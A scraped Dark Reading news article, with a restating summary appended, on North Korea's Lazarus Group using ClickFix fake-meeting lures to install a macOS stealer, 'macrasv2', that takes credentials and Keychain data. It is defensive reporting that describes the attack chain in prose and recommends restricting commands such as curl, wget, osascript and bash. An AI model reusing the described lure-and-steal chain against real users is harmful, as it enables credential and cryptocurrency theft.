North Korea's Lazarus Targets macOS Users via ClickFix TechTarget and Informa Tech’s Digital Business Combine.TechTarget and InformaTechTarget and Informa Tech’s Digital Business Combine.Together, we power an unparalleled network of 220+ online properties covering 10,000+ granular topics, serving an audience of 50+ million professionals with original, objective content from trusted sources. We help you gain critical insights and make more informed decisions across your business priorities.Dark Reading Resource LibraryBlack Hat NewsOmdia CybersecurityAdvertiseNewsletter Sign-UpNewsletter Sign-UpCybersecurity TopicsRelated TopicsApplication SecurityCybersecurity CareersCloud SecurityCyber RiskCyberattacks & Data BreachesCybersecurity AnalyticsCybersecurity OperationsData PrivacyEndpoint SecurityICS/OT SecurityIdentity & Access Mgmt SecurityInsider ThreatsIoTMobile SecurityPerimeterPhysical SecurityRemote WorkforceThreat IntelligenceVulnerabilities & ThreatsRecent in Cybersecurity TopicsСloud SecurityHackers Use AI for Exploit Development, Attack AutomationHackers Use AI for Exploit Development, Attack AutomationbyAlexander CulafiMay 11, 20264 Min ReadСloud SecurityAfter Replacing TeamPCP Malware, 'PCPJack' Steals Cloud SecretsAfter Replacing TeamPCP Malware, 'PCPJack' Steals Cloud SecretsbyNate NelsonMay 7, 20265 Min ReadWorld Related TopicsDR GlobalMiddle East & AfricaAsia PacificLatin AmericaSee AllThe EdgeDR TechnologyEventsRelated TopicsUpcoming EventsPodcastsWebinarsSEE ALLResourcesRelated TopicsResource LibraryNewslettersPodcastsReportsVideosWebinarsWhite Papers Partner PerspectivesDark Reading Resource LibraryThreat IntelligenceData PrivacyCybersecurity OperationsApplication SecurityNewsNorth Korea's Lazarus Targets macOS Users via ClickFixLazarus continues leveraging ClickFix for initial access and data theft: in this case, against Mac-centric organizations and their high-value leaders.Alexander Culafi,Senior News Writer,Dark ReadingApril 24, 20264 Min ReadSource: Alexey Stiop via Alamy Stock PhotoNorth Korea's Lazarus Group is using ClickFix attacks to launch cyberattacks using novel macOS malware.That's according to security vendor Any.Run, which on April 21 published research concerning a new nation-state threat campaign. Authored by offensive security expert and Birmingham Cyber Arms founder Mauro Eldritch, the report covers a wave of ClickFix attacks targeting organizations, used to distribute a range of malware. This latest research focuses primarily on a newly identified macOS malware kit that is currently being leveraged in the wild.ClickFix is a social engineering technique that rose to prominence over the past year or so. A threat actor tricks the victim into visiting attacker-operated infrastructure, such as a website masquerading as a fake Zoom meeting.When the victim reaches the Web page, they are told there are technical issues that may only be resolved if they update their software. The attacker usually instructs the victim into running malicious code, either by copying and pasting a run command (on Windows) or downloading and opening a file with the code on it (typically in macOS). Related:From Stuxnet to ChatGPT: 20 News Events That Shaped CyberClickFix has been a favorite tactic of North Korean threat actors lately. Entities like Lazarus Group use it for initial access, with the ultimate goal of stealing cryptocurrency or intellectual property, or to conduct espionage. In this latest campaign, Lazarus Group is targeting FinTech, cryptocurrency, and high-value leaders in organizations with a substantial reliance on macOS devices.The Complete macOS Malware Attack ChainAccording to Eldritch, an attacker contacts a business leader through Telegram, often by using a compromised account belonging to a colleague or contact known to the target. The attacker sends the target a fake Zoom, Microsoft Teams, or Google Meet invitation to set up a conversation under the pretense of a business opportunity. North Korean actors have also used a potential job offer as a lure.The target joins the call and is prompted to enter a command to fix connection issues. Because the command is entered by the user, many traditional security controls remain untriggered. And because users are conditioned to agree to taking actions like updating software, techniques like ClickFix might not raise as many red flags to the user as a traditional phishing email. Especially when the attacker uses a business meeting as a means of lowering the target's guard ahead of time.Then, "the operation is focused on extracting business value as quickly as possible," the blog post read. "The attacker collects credentials, browser sessions, and system-stored secrets, including macOS Keychain data." Such assets can then provide access to corporate systems, software-as-a-service (SaaS) platforms, and financial resources, Any.Run added.Related:Exploit Cyber-Frenzy Threatens Millions via Critical cPanel VulnerabilityOnce the user enters the command and connects to attacker infrastructure, malware is downloaded as a macOS application .bin file under an unassuming name, like "teamsSDK.bin." This application installs the second stage binary and includes additional ways of gaining the user's trust, such as a message saying software is updated. The next binary is a system profiler that connects to attacker-hosted command-and-control (C2) infrastructure. This is then followed by a persistence mechanism that re-invokes the malware kit at every login before the primary component, a stealer named "macrasv2," is loaded. The stealer stages previously collected data like browser extension data, stored browser credentials and cookies, macOS keychain entries, and more, and consolidates them into a temporary directory for exfiltration through Telegram. Macrasv2 then runs a self-deletion script and the infection chain is complete. While many North Korean state-sponsored attacks are sophisticated in nature, Eldritch noted that macrasv2 is "badly written." Several components remain either unimplemented or incorrectly implemented, while some components enter "infinite loops that may expose its presence due to system resource starvation." The malware also left multiple operational security weaknesses, including exposed Telegram bot tokens and C2 endpoints with missing authentication.Related:Vect 2.0 Ransomware Acts as Wiper, Thanks to Design ErrorHow to Avoid ClickFix CompromiseWhile Any.Run's blog contains indicators of compromise, it must also be noted that no matter how sophisticated an attack chain may seem, ClickFix only works if the end user runs a command or downloads a file. As such, the best way for organizations to combat ClickFix is to educate leaders and employees on how the technique works and why it's successful, and not to run suspicious commands or open files as a means to solve connectivity problems. Aleksey Lapshin, CEO of Any.Run, tells Dark Reading that Mac users in particular should be trained out of the illusion of safety many have, based on a history of being told "Macs don't get malware." Organizations should also actively track ClickFix samples in the wild and feed the actual commands back into EDR rules and execution policies. Finally, log and restrict high-risk commands on endpoints like curl, wget, osascript, and bash; the CEO says many organizations don't monitor this at all, especially on macOS."Attackers always look for the cheapest entry point with the highest hit rate. Breaking through the outer moat of enterprise security, such as email gateways, EDR, perimeter filtering, gets more expensive every year, so they're picking new paths," Lapshin says. "And the cheapest path right now is one where the attacker is literally the user, voluntarily executing commands on their own machine."About the AuthorAlexander CulafiSenior News Writer, Dark ReadingAlex is an award-winning writer, journalist, and podcast host based in Boston. After cutting his teeth writing for independent gaming publications as a teenager, he graduated from Emerson College in 2016 with a Bachelor of Science in journalism. He has previously been published on VentureFizz, Search Security, Nintendo World Report, and elsewhere. In his spare time, Alex hosts the weekly Nintendo podcast Talk Nintendo Podcast and works on personal writing projects, including two previously self-published science fiction novels.See more from Alexander CulafiWant more Dark Reading stories in your Google search results?Add Us NowMore InsightsIndustry ReportsHow Enterprises Are Developing Secure ApplicationsInside RSAC 2026: security leaders reveal the risks redefining your defense strategyHow Enterprises Are Harnessing Emerging Technologies in CybersecurityDitch the Data Center: Understanding Flexible Cloud Infrastructure Security Management2025 State of MalwareAccess More ResearchWebinarsThe New Attack Surface: How Attackers Are Exploiting OAuth to Own Your Cloud WorkspacePrompt Injection Is Just the Start: Securing LLMs in AI SystemsAnatomy of a Data Breach: What to Do if it Happens to YouHow Well Can You See What's in Your Cloud?Implementing CTEM: Beyond Vulnerability ManagementMore WebinarsEditor's ChoiceThreat IntelligenceFrom Stuxnet to ChatGPT: 20 News Events That Shaped CyberFrom Stuxnet to ChatGPT: 20 News Events That Shaped CyberbyDark Reading Editorial TeamMay 6, 202631 Min ReadCyber RiskPhysical Cargo Theft Gets a Boost From CybercriminalsPhysical Cargo Theft Gets a Boost From CybercriminalsbyRobert LemosMay 4, 20265 Min ReadWant more Dark Reading stories in your Google search results?Keep up with the latest cybersecurity threats, newly discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.SubscribeRSAC 2026: key news & insightsAt RSAC 2026, Dark Reading captured critical intelligence on AI, new attack methods, geopolitics, and much moreGet Your RecapWebinarsThe New Attack Surface: How Attackers Are Exploiting OAuth to Own Your Cloud WorkspaceWed, June 24,2026 at 1pm ESTPrompt Injection Is Just the Start: Securing LLMs in AI SystemsTues, May 26, 2026, at 1pm ESTAnatomy of a Data Breach: What to Do if it Happens to YouJune 18th, 2026 | 11:00am -5:00pm ET | Doors Open at 10:30am ETHow Well Can You See What's in Your Cloud?Thurs, June 4, 2026 at 1:00pm ESTImplementing CTEM: Beyond Vulnerability ManagementThurs, May 21, 2026 at 1pm ESTMore WebinarsBlack Hat USA | Mandalay Bay, Las VegasThe premier cybersecurity event of the year returns to Mandalay Bay with a re‑engineered, six‑day program built to ignite innovation, push boundaries, and bring the global security community together like never before. Use code: DARKREADING to save $200 on a Briefings pass or $100 on a Business pass.GET YOUR PASSDiscover MoreBlack HatOmdiaWorking With UsAbout UsAdvertiseReprintsJoin UsNewsletter Sign-UpFollow UsCopyright © 2026 TechTarget, Inc. d/b/a Informa TechTarget. This website is owned and operated by Informa TechTarget, part of a global network that informs, influences and connects the world’s technology buyers and sellers. All copyright resides with them. Informa PLC’s registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. TechTarget, Inc.’s registered office is 275 Grove St. Newton, MA 02466.Home|Cookie Policy|Privacy|Terms of UseYour Privacy Choices

North Korea’s Lazarus Group is currently deploying a novel macOS malware campaign utilizing the ClickFix social engineering technique, as detailed by Any.Run in April 2026. This operation, spearheaded by the Lazarus Group, targets Mac-centric organizations and prominent leadership figures, leveraging technical support requests disguised as Zoom, Microsoft Teams, or Google Meet invitations to gain initial access. The core of the attack involves tricking victims into executing malicious code, often a disguised application like “teamsSDK.bin,” which then installs a system profiler connected to a Command and Control (C2) server. This process is further fortified with persistence mechanisms and a stealer named “macrasv2” designed to exfiltrate sensitive data, including credentials, browser sessions, macOS Keychain entries, and system information. According to offensive security expert Mauro Eldritch, the malware exhibits surprisingly poor coding, with poorly implemented components and resource-intensive loops potentially revealing its presence. The malware’s tactics include impersonating business opportunities or job offers to lower user defenses. The group’s objectives center around acquiring cryptocurrency, intellectual property, or conducting espionage operations. Any.Run emphasizes that the success of the ClickFix technique hinges on user action—specifically, the execution of suspicious commands—highlighting the need for robust employee training and vigilance against these deceptive tactics. Aleksey Lapshin, CEO of Any.Run, stresses the importance of recognizing that attackers are prioritizing the cheapest, most effective entry points into organizations, frequently bypassing traditional security measures like email gateways and Endpoint Detection and Response (EDR) systems, pointing out that user-driven command execution is the currently least defended area. Lapshin advocates for careful monitoring of suspicious commands, particularly those involving curl, wget, osascript, and bash, and for restricting their use on macOS devices, recognizing this as a key vulnerability exploited by the Lazarus Group.